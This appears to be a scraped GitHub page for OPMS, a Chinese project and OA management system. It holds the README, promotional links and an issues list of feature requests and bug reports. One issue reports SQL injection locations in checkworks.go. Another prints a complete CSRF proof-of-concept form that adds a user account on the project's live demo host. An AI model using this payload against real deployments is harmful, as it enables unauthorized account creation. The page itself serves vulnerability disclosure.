lock-upme / opms Goto Github PK

View Code? Open in Web Editor NEW

1.1K 115.0 468.0 5.2 MB

OPMS项目+OA管理系统

License: GNU General Public License v2.0

Go 20.90% CSS 8.46% HTML 0.52% Batchfile 0.05% JavaScript 45.39% Smarty 24.69%

opms's Introduction

OPMS

OPMS项目+OA管理系统

OPMS管理系统是意思是PMS+OA，项目+办公管理。符合日常项目和OA管理，特别适合扁平化管理的微中小企业。

OPMS采用是Beego框架和Bootstrap前端框架构建立，适合不同平台，不同的终端，简单方便实用的原则。数据库采用Mysql，缓存采用Redis。在部署过程中，如果没有Redis，不影响使用。

本系统是免费的软件，部署很方便。

OPMS的由来：

公司之前用的项目管理软件是禅道PMS，功能是很强大，学习成本也大。

在实际的项目应用中，有许多功能点都用不到或者很少用，可能它的系统是面向不同行业项目管理吧。

结合实际的项目要求和人事的日常工作经验要求，于是OPMS管理系统诞生了！

创新设计·全新功能织蝶云新品上线

织蝶云项目管理需求、任务、Bug、看板、思维导图、甘特图、日历、报表、列表多种任务视图
织蝶云客户CRM 客户、公海、线索、商机、合同、售后、目标、统计多种嵌套功能
织蝶云审批流程智能工作流程及表单设计，自定权限控制，让每个流程实现自动化
织蝶云工作报告人性化的报告展示，轻松解决日报、周报、月报发布审阅，智能统计报告
OA管理考勤、日程、文档、知识、相册、人事简历、公告、IM聊天等丰富的功能

新品地址：https://www.zhidieyun.com/

OPMS官网：

http://opms.milu365.cn/

手册文档：

http://opms.docs.milu365.cn/

在线体验：

http://opms.demo.milu365.cn/

加QQ群（871221961）获取用户名和密码

技术讨论群：

QQ群1(已满)：451420312

QQ群2(已满)：592130397

QQ群3(已满)：651479008

QQ群4(已满)：660307579

QQ群5(已满): 753661431

QQ群6: 871221961

捐赠

支付宝：

微信:

效果图预览

opms's People

Contributors

Stargazers

Watchers

Forkers

shengxianye lamproae toophy lakevilladom jackwangcumt yiketudou tomzhang coderlee slevenqin nwaycn ycyoes dw250100785 venliong hegzh stonewl897 hlj2722 byesoft lostmonk avldya potina fhaoquan kgtom nineeyetiger gaodoo xww zhaozhi3758 xuxueyun dungnt8805 elecbeauty joe2hpimn mbywin snoworld888 yinrongping linkedtec grasshourse emali2hf igit-cn yeung908 jnan77 progyuan chenlongwill simple555a itachi123456789 chenghuama geekgalaxy dustfinger001 sabertang jamesluo2015 jakeywu chenkaigithub vincentchen butlife jzxyouok davidmr001 xiafish201 qdsncaq jacking124 xinqudao cash2one smallred1024 itjac phardye zjunyu myhui frank-webs lin0244 zhangjiefan1992 hcxiong sanikoyes lbzhao28 lday0321 finersoft 39627020 liuguicheng codeqqby haikuo81 tangbotaohn qaz734913414 tianbianlan kira8565 btcltc southj emilywn flybird119 jango2015 jangoos qizexi nicknios123 queende7 skywangjie camark muxi166 phrnet huncent louisrenweiwei yxxit tianzexiao jiangbing9293 xiazemin jiafenggit

opms's Issues

源代码版本库

请问OPMS的依赖包可以一起发放吗？我发现clone下来之后有些代码需要引用的包不存在去github下载也是404了。比如github.com/BurntSushi/graphics-go/graphics

消息小红点

小红点很重要，以前做OA的时候，领导对这个小红点需求屡次提出：我不可能每次都进入每个模块看看有没有新内容！

Trying to get in touch regarding a security issue

Hey there!

I belong to an open source security research community, and a member (@AFKL-CUIT) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

项目、需求、任务、bug都不能删除吗

新建了一些测试项目，没法删除

新增简历页面中的“提交保存”按钮bug

点击“提交保存”后，数据已经提交，但页面跳转错误

This project has multiple sql injection vulnerabilities.

I have scanned this project using codeql. There are 7 places in the opms\models\checkworks\checkworks.go file where sql injection can be performed.

Here are two examples of them.

In lines 30 and 31 of the opms\controller\checkworks\checkworks.go file, the system gets the type and date GET parameters and passes them into the ListCheckwork function.

Then the parameters are dynamically spliced strings, leading to sql injection.

Other places that can cause sql injection are.

id	filepath	lineNum
1	opms/models/checkworks/checkworks.go	35
2	opms/models/checkworks/checkworks.go	38
3	opms/models/checkworks/checkworks.go	66
4	opms/models/checkworks/checkworks.go	69
5	opms/models/checkworks/checkworks.go	128
6	opms/models/checkworks/checkworks.go	147
7	opms/models/checkworks/checkworks.go	167

增加与gogs对接

看了改项目，感觉很不错，很简洁！
系统能与gogs这样的代码库关联。

There is one CSRF vulnerability that can add the account

Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, add a user

CSRF Exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://opms.demo.milu365.cn/user/add" method="POST">
      <input type="hidden" name="username" value="lisi" />
      <input type="hidden" name="password" value="a1234567" />
      <input type="hidden" name="depart" value="1462290164626094232" />
      <input type="hidden" name="position" value="1462292006260420932" />
      <input type="hidden" name="realname" value="lisi" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="birth" value="2019&#45;10&#45;14" />
      <input type="hidden" name="email" value="123&#64;qq&#46;com" />
      <input type="hidden" name="webchat" value="" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="phone" value="13800138000" />
      <input type="hidden" name="tel" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="emercontact" value="lxr" />
      <input type="hidden" name="emerphone" value="13800138000" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user.

员工不能删除、知识也不能删除？

各种不能删除？
没找到删除员工和知识以及相册里面的照片的。
如果只能屏蔽员工的话,审批的时候仍然可以选择这个离职的人,如果这审核的人离职了,这审批流程就走不动了.不就耽误了审批时间?
这个知识可能就成了随便写的东西，不让删除多尴尬？

另外:
当时觉得请假可以请，就提交了，然后过1分钟后就觉得哪里不对，然后想在未审批之前自己取消请假不行？

审批权限改了不生效。重启OPMS都没生效。

请假之类的日期天数不能自动计算。

头像不能从相册里面选择？

在手机上运行，左边的菜单滑动响应的问题

在手机上运行，左边的菜单滑动时，一般是右边的内容区域响应，菜单区域难以上下滑动。

新添加员工页，部门与职位建议不应该是静态的

各个部门对应的职位应该有不一样的，当选择不同的部门时，它对应的职位建议不一样，如研发部和销售部设置的职位应该有不一样呀 :)

简历管理中的操作状态需要强制刷新页面才会改变

使用简历管理中的操作对简历状态进行修改时，前面的状态会有对应的改变，但操作里面的状态并没有改变，强制刷新页面后才会改变。

权限管理更新错误

func (this *ManageGroupPermissionController) Post() {
在这个函数中，在for循环中使用了SnowFlakeId来生成id
但实际使用过程中发现，如果更新太快，会导致snowFlakeid获取的id重复，导致设置权限失败

看了一下snowFlakeid，发现这个东西是根据当前毫秒级时间戳+线程id+序号
由于每次都生成新的序号，导致在同已毫秒内获取到的id都是一样的，建议对Util的SnowFlakeId进行修改

由于没有时间测试，所以我简单处理了一下，目前我的解决方案是
iw, _ := goSnowFlake.NewIdWorker(1)
for _, v := range names {
pid, _ := strconv.Atoi(v)
id, err := iw.NextId()
if err != nil {
id, _ = iw.NextId()
}
groupPermission.Id = id
groupPermission.Permissionid = int64(pid)
err = AddGroupsPermission(groupPermission)
}

请问OPMS的依赖包如何安装？比如github.com/BurntSushi/graphics-go/graphics

请问这些包如何安装？

建议【知识分享】模块中提供文件上传的功能

软件很简洁实用，建议【知识分享】模块中也能提供文件上传的功能，谢谢！

需求状态无法设置为已关闭

貌似是个bug

几点建议

知识分享模块中分享的内容建议按照时间线倒序放置，这样能够总是看到新发布的内容
需求模块中添加的附件只能在“编辑模式”下才能预览下载，是否是bug
自定义头像时，使用自己上传的图片，保存不成功

这个工程,表结构怎么去创建?

文件上传的问题

比如针对albums的多图片上传，经测试目前不支持中文文件名，一旦使用含有中文的图片名，运行时服务器端会报错：slice越界。经提示，问题出在：
ext := utils.SubString(filename, strings.LastIndex(filename, "."), 5)
可能是由于文件名不是utf8编码引起的，做如下处理后，正常：
ext := utils.SubString(utils.Unicode(filename), strings.LastIndex(utils.Unicode(filename), "."), 5)
请作者测试验证。

产品、项目、测试分开

各司其职，按如下关系划分:

产品-需求
项目-任务-子任务
测试-用例-bug
这样产品经理只需要管需求，项目经理只需要管任务，品控只需要管用例。
任务和用例没有单独的创建入口，都从需求处创建，这样动了需求对应要调整的任务和用例也一目了然。

简历查看预览无效

简历查看预览无效，只是新开一个一模一样的页面出来

如何设置考勤的时间

如何设置考勤的时间? 比如我想设定上下班时间可以不?